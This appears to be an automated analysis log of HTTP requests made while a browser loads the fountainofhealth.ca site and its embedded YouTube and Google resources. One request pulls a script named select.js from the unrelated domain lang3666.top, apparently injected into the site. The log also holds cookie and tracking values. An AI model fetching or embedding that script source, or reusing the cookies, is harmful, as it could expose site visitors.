Source: global traffic HTTP traffic detected: GET /sites/default/files/inline-images/icon-R-300_6.png HTTP/1.1Host: fountainofhealth.caConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.1.1981881509.1747926276; _ga_WF39Z4TEVT=GS2.1.s1747926276$o1$g0$t1747926276$j0$l0$h0
Source: global traffic HTTP traffic detected: GET /js/th/v15QCjm6WO3QEs80chG8QfS1HlFrDoWBLlSvxspkiuA.js HTTP/1.1host: www.google.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: */*x-client-data: CLf3ygE=sec-fetch-site: cross-sitesec-fetch-mode: no-corssec-fetch-dest: scriptsec-fetch-storage-access: activereferer: https://www.youtube.com/accept-encoding: identityaccept-language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /sites/default/files/inline-images/button-thoughts-r_1.png HTTP/1.1Host: fountainofhealth.caConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.1.1981881509.1747926276; _ga_WF39Z4TEVT=GS2.1.s1747926276$o1$g0$t1747926276$j0$l0$h0
Source: global traffic HTTP traffic detected: GET /sites/default/files/inline-images/leaves-banner-2_0_0.jpg HTTP/1.1Host: fountainofhealth.caConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.1.1981881509.1747926276; _ga_WF39Z4TEVT=GS2.1.s1747926276$o1$g0$t1747926276$j0$l0$h0
Source: global traffic HTTP traffic detected: GET /cv/js/sender/v1/cast_sender.js HTTP/1.1host: www.gstatic.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: */*x-client-data: CLf3ygE=sec-fetch-site: cross-sitesec-fetch-mode: no-corssec-fetch-dest: scriptsec-fetch-storage-access: activereferer: https://www.youtube.com/accept-encoding: identityaccept-language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /pagead/id?slf_rd=1 HTTP/1.1host: googleads.g.doubleclick.netsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: */*origin: https://www.youtube.comx-client-data: CLf3ygE=sec-fetch-site: cross-sitesec-fetch-mode: corssec-fetch-dest: emptysec-fetch-storage-access: activereferer: https://www.youtube.com/accept-encoding: identityaccept-language: en-US,en;q=0.9priority: u=1, i
Source: global traffic HTTP traffic detected: GET /sites/default/files/inline-images/youtube-t.svg HTTP/1.1Host: fountainofhealth.caConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://fountainofhealth.ca/enAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.1.1981881509.1747926276; _ga_WF39Z4TEVT=GS2.1.s1747926276$o1$g0$t1747926276$j0$l0$h0
Source: global traffic HTTP traffic detected: GET /sites/default/files/inline-images/facebook-t.svg HTTP/1.1Host: fountainofhealth.caConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://fountainofhealth.ca/enAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.1.1981881509.1747926276; _ga_WF39Z4TEVT=GS2.1.s1747926276$o1$g0$t1747926276$j0$l0$h0
Source: global traffic HTTP traffic detected: GET /pagead/id HTTP/1.1host: googleads.g.doubleclick.netsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: */*origin: https://www.youtube.comx-client-data: CLf3ygE=sec-fetch-site: cross-sitesec-fetch-mode: corssec-fetch-dest: emptysec-fetch-storage-access: activereferer: https://www.youtube.com/accept-encoding: identityaccept-language: en-US,en;q=0.9priority: u=1, i
Source: global traffic HTTP traffic detected: GET /sites/default/files/inline-images/twitter-t.svg HTTP/1.1Host: fountainofhealth.caConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://fountainofhealth.ca/enAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.1.1981881509.1747926276; _ga_WF39Z4TEVT=GS2.1.s1747926276$o1$g0$t1747926276$j0$l0$h0
Source: global traffic HTTP traffic detected: GET /sites/default/files/inline-images/button-thoughts-i_1.png HTTP/1.1Host: fountainofhealth.caConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.1.1981881509.1747926276; _ga_WF39Z4TEVT=GS2.1.s1747926276$o1$g0$t1747926276$j0$l0$h0
Source: global traffic HTTP traffic detected: GET /sites/default/files/inline-images/icon-1-300_6.png HTTP/1.1Host: fountainofhealth.caConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.1.1981881509.1747926276; _ga_WF39Z4TEVT=GS2.1.s1747926276$o1$g0$t1747926276$j0$l0$h0
Source: global traffic HTTP traffic detected: GET /sites/default/files/inline-images/icon-V-300_6.png HTTP/1.1Host: fountainofhealth.caConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.1.1981881509.1747926276; _ga_WF39Z4TEVT=GS2.1.s1747926276$o1$g0$t1747926276$j0$l0$h0
Source: global traffic HTTP traffic detected: GET /lv/select.js?d1e20ded6adf5a3d55 HTTP/1.1Host: lang3666.topConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptSec-Fetch-Storage-Access: activeReferer: https://fountainofhealth.ca/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /themes/custom/foh/css/img/icons8-search-28.png HTTP/1.1Host: fountainofhealth.caConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://fountainofhealth.ca/themes/custom/foh/css/style.css?swjs7bAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.1.1981881509.1747926276; _ga_WF39Z4TEVT=GS2.1.s1747926276$o1$g0$t1747926276$j0$l0$h0
Source: global traffic HTTP traffic detected: GET /sites/default/files/inline-images/button-thoughts-v_1.png HTTP/1.1Host: fountainofhealth.caConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.1.1981881509.1747926276; _ga_WF39Z4TEVT=GS2.1.s1747926276$o1$g0$t1747926276$j0$l0$h0
Source: global traffic HTTP traffic detected: GET /themes/custom/foh/images/Testimonials/Aging_featured-2.jpg HTTP/1.1Host: fountainofhealth.caConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://fountainofhealth.ca/themes/custom/foh/css/style.css?swjs7bAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.1.1981881509.1747926276; _ga_WF39Z4TEVT=GS2.1.s1747926276$o1$g0$t1747926276$j0$l0$h0
Source: global traffic HTTP traffic detected: GET /themes/custom/foh/images/Testimonials/speakers-420.jpg HTTP/1.1Host: fountainofhealth.caConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://fountainofhealth.ca/themes/custom/foh/css/style.css?swjs7bAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.1.1981881509.1747926276; _ga_WF39Z4TEVT=GS2.1.s1747926276$o1$g0$t1747926276$j0$l0$h0
Source: global traffic HTTP traffic detected: GET /sites/default/files/inline-images/wellness-app.gif HTTP/1.1Host: fountainofhealth.caConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://fountainofhealth.ca/themes/custom/foh/css/style.css?swjs7bAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.1.1981881509.1747926276; _ga_WF39Z4TEVT=GS2.1.s1747926276$o1$g0$t1747926276$j0$l0$h0
Source: global traffic HTTP traffic detected: GET /generate_204?X6C5Ug HTTP/1.1host: www.youtube.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8x-client-data: CLf3ygE=sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: imagesec-fetch-storage-access: activereferer: https://www.youtube.com/embed/h15NcT6UXh0?si=YrXkudamh5IoggTRaccept-encoding: identityaccept-language: en-US,en;q=0.9cookie: YSC=gp6ufC6NPdwcookie: __Secure-ROLLOUT_TOKEN=CLLHipfu3syhbhCrlubnrLeNAxirlubnrLeNAw%3D%3Dcookie: VISITOR_INFO1_LIVE=YyBoEXXepB0cookie: VISITOR_PRIVACY_METADATA=CgJVUxIEGgAgUA%3D%3Dpriority: i
Source: global traffic HTTP traffic detected: GET /pagead/id?slf_rd=1 HTTP/1.1host: googleads.g.doubleclick.netsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: */*origin: https://www.youtube.comx-client-data: CLf3ygE=sec-fetch-site: cross-sitesec-fetch-mode: corssec-fetch-dest: emptysec-fetch-storage-access: activereferer: https://www.youtube.com/accept-encoding: identityaccept-language: en-US,en;q=0.9priority: u=1, i
Source: global traffic HTTP traffic detected: GET /vi_webp/gobWGqPjLSQ/hqdefault.webp HTTP/1.1host: i.ytimg.comuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept: */*x-client-data: CLf3ygE=sec-fetch-site: nonesec-fetch-mode: corssec-fetch-dest: emptysec-fetch-storage-access: activeaccept-encoding: identityaccept-language: en-US,en;q=0.9priority: u=1, i
Source: global traffic HTTP traffic detected: GET /ytc/AIdro_kFvgKN3sdCZkq9BPU_-UiAQV6pGa3Qxc9oGBglVNBEEA=s68-c-k-c0x00ffffff-no-rj HTTP/1.1host: yt3.ggpht.comuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept: */*x-client-data: CLf3ygE=sec-fetch-site: nonesec-fetch-mode: corssec-fetch-dest: emptysec-fetch-storage-access: activeaccept-encoding: identityaccept-language: en-US,en;q=0.9priority: u=1, i
Source: global traffic HTTP traffic detected: GET /themes/custom/foh/images/Testimonials/doctor-21.jpg HTTP/1.1Host: fountainofhealth.caConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://fountainofhealth.ca/themes/custom/foh/css/style.css?swjs7bAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.1.1981881509.1747926276; _ga_WF39Z4TEVT=GS2.1.s1747926276$o1$g0$t1747926276$j0$l0$h0
Source: global traffic HTTP traffic detected: GET /generate_204?S_CoiQ HTTP/1.1host: www.youtube.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8x-client-data: CLf3ygE=sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: imagesec-fetch-storage-access: activereferer: https://www.youtube.com/embed/FURi5aHgp1g?si=Y2rCuE23jf8bkHaXaccept-encoding: identityaccept-language: en-US,en;q=0.9cookie: YSC=gp6ufC6NPdwcookie: __Secure-ROLLOUT_TOKEN=CLLHipfu3syhbhCrlubnrLeNAxirlubnrLeNAw%3D%3Dcookie: VISITOR_INFO1_LIVE=YyBoEXXepB0cookie: VISITOR_PRIVACY_METADATA=CgJVUxIEGgAgUA%3D%3Dpriority: i
Source: global traffic HTTP traffic detected: GET /generate_204?HJMx7A HTTP/1.1host: www.youtube.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8x-client-data: CLf3ygE=sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: imagesec-fetch-storage-access: activereferer: https://www.youtube.com/embed/gobWGqPjLSQ?si=E-htCYBt9m3YW0wsaccept-encoding: identityaccept-language: en-US,en;q=0.9cookie: YSC=gp6ufC6NPdwcookie: __Secure-ROLLOUT_TOKEN=CLLHipfu3syhbhCrlubnrLeNAxirlubnrLeNAw%3D%3Dcookie: VISITOR_INFO1_LIVE=YyBoEXXepB0cookie: VISITOR_PRIVACY_METADATA=CgJVUxIEGgAgUA%3D%3Dpriority: i
Source: global traffic HTTP traffic detected: GET /vi_webp/h15NcT6UXh0/maxresdefault.webp HTTP/1.1host: i.ytimg.comuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept: */*x-client-data: CLf3ygE=sec-fetch-site: nonesec-fetch-mode: corssec-fetch-dest: emptysec-fetch-storage-access: activeaccept-encoding: identityaccept-language: en-US,en;q=0.9priority: u=1, i
Source: global traffic HTTP traffic detected: GET /pagead/id?slf_rd=1 HTTP/1.1host: googleads.g.doubleclick.netsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: */*origin: https://www.youtube.comx-client-data: CLf3ygE=sec-fetch-site: cross-sitesec-fetch-mode: corssec-fetch-dest: emptysec-fetch-storage-access: activereferer: https://www.youtube.com/accept-encoding: identityaccept-language: en-US,en;q=0.9priority: u=1, i
Source: global traffic HTTP traffic detected: GET /vi/FURi5aHgp1g/maxresdefault.jpg?sqp=-oaymwEmCIAKENAF8quKqQMa8AEB-AH-CYAC0AWKAgwIABABGH8gOChCMA8=&rs=AOn4CLCF295eNAE90ECcWgYwCgZpl6X5Wg HTTP/1.1host: i.ytimg.comuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept: */*x-client-data: CLf3ygE=sec-fetch-site: nonesec-fetch-mode: corssec-fetch-dest: emptysec-fetch-storage-access: activeaccept-encoding: identityaccept-language: en-US,en;q=0.9priority: u=1, i
Source: global traffic HTTP traffic detected: GET /eureka/clank/134/cast_sender.js HTTP/1.1host: www.gstatic.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: */*x-client-data: CLf3ygE=sec-fetch-site: cross-sitesec-fetch-mode: no-corssec-fetch-dest: scriptsec-fetch-storage-access: activereferer: https://www.youtube.com/accept-encoding: identityaccept-language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /sites/default/files/inline-images/icons8-download-40.png HTTP/1.1Host: fountainofhealth.caConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.1.1981881509.1747926276; _ga_WF39Z4TEVT=GS2.1.s1747926276$o1$g0$t1747926276$j0$l0$h0
Source: global traffic HTTP traffic detected: GET /sites/default/files/inline-images/button-thoughts-e_1.png HTTP/1.1Host: fountainofhealth.caConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.1.1981881509.1747926276; _ga_WF39Z4TEVT=GS2.1.s1747926276$o1$g0$t1747926276$j0$l0$h0
Source: global traffic HTTP traffic detected: GET /sites/default/files/inline-images/icon-E-300_6.png HTTP/1.1Host: fountainofhealth.caConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.1.1981881509.1747926276; _ga_WF39Z4TEVT=GS2.1.s1747926276$o1$g0$t1747926276$j0$l0$h0
Source: global traffic HTTP traffic detected: GET /sites/default/files/inline-images/icons8-up-64.png HTTP/1.1Host: fountainofhealth.caConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.1.1981881509.1747926276; _ga_WF39Z4TEVT=GS2.1.s1747926276$o1$g0$t1747926276$j0$l0$h0
Source: global traffic HTTP traffic detected: GET /sites/default/files/inline-images/foh-logo%203.svg HTTP/1.1Host: fountainofhealth.caConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.1.1981881509.1747926276; _ga_WF39Z4TEVT=GS2.1.s1747926276$o1$g0$t1747926276$j0$l0$h0
Source: global traffic HTTP traffic detected: GET /sites/default/files/inline-images/youtube-t.svg HTTP/1.1Host: fountainofhealth.caConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.1.1981881509.1747926276; _ga_WF39Z4TEVT=GS2.1.s1747926276$o1$g0$t1747926276$j0$l0$h0
Source: global traffic HTTP traffic detected: GET /sites/default/files/styles/slider1/public/2023-11/Group%209826%20%281%29.png?itok=xYH_8dLj HTTP/1.1Host: fountainofhealth.caConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://fountainofhealth.ca/enAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.1.1981881509.1747926276; _ga_WF39Z4TEVT=GS2.1.s1747926276$o1$g0$t1747926276$j0$l0$h0
Source: global traffic HTTP traffic detected: GET /sites/default/files/styles/slider1/public/2023-12/Group%209825%20%282%29.png?itok=vf0UJVIa HTTP/1.1Host: fountainofhealth.caConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://fountainofhealth.ca/enAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.1.1981881509.1747926276; _ga_WF39Z4TEVT=GS2.1.s1747926276$o1$g0$t1747926276$j0$l0$h0
Source: global traffic HTTP traffic detected: GET /sites/default/files/inline-images/facebook-t.svg HTTP/1.1Host: fountainofhealth.caConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.1.1981881509.1747926276; _ga_WF39Z4TEVT=GS2.1.s1747926276$o1$g0$t1747926276$j0$l0$h0
Source: global traffic HTTP traffic detected: GET /sites/default/files/inline-images/Thrive_infographic_EN3%20%283%29.jpg HTTP/1.1Host: fountainofhealth.caConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.1.1981881509.1747926276; _ga_WF39Z4TEVT=GS2.1.s1747926276$o1$g0$t1747926276$j0$l0$h0
